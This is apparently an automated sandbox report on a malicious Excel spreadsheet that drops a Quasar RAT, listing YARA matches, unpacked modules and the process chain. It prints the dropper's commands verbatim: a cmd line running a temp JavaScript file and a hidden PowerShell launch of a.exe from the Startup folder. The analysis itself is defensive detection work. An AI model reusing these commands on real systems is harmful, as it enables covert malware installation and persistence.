Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.adwa.spyw.expl.evad.winXLS@21/14@13/5
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_01
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Mutant created: \Sessions\1\BaseNamedObjects\Kdjaq
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{1430B6D9-1049-4B57-9D78-04A0226B6D97} - OProcSessId.dat Jump to behavior
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls OLE indicator, Workbook stream: true
Source: C:\ProgramData\a.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM WIN32_PROCESSOR
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\ProgramData\a.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\ProgramData\a.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\ProgramData\a.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
Source: unknown Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe Jump to behavior
Source: C:\ProgramData\a.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 4 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: C:\ProgramData\a.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\ProgramData\a.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
.NET source code contains potential unpacker
Source: 1.2.a.exe.410000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.a.exe.410000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.a.exe.540000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.2.a.exe.540000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.0.a.exe.270000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.2.a.exe.270000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.a.exe.a90000.1.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.a.exe.a90000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.2.a.exe.5b0000.0.unpack, Form2.cs .Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' Jump to behavior
Yara detected Beds Obfuscator
Source: Yara match File source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match File source: 1.2.a.exe.6e20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.7530000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.7590000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.7590000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.6e20000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.7530000.5.raw.unpack, type: UNPACKEDPE
Yara detected Costura Assembly Loader
Source: Yara match File source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match File source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
